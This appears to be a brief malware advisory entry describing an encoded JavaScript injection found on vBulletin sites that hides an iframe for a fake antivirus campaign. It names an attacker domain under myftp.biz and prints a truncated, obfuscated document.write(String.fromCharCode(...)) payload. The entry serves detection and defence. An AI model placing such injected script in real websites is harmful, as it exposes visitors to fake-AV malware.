Description: Conditional malware identified and hidden inside an encoded javascript block. It is used to hide an iframe used for a Fake AV campaign.
Domains involved:
http://xxbqjsb.myftp.biz/glwq
.. others within myftp.biz (randomly generated)Affecting: Common on Vbulletin sites.
Latest update: 2013/Jun
Malware dump:
document.write(String. fromCharCode('>uv{ng@0vnnt:nq"}"rqukvkqp..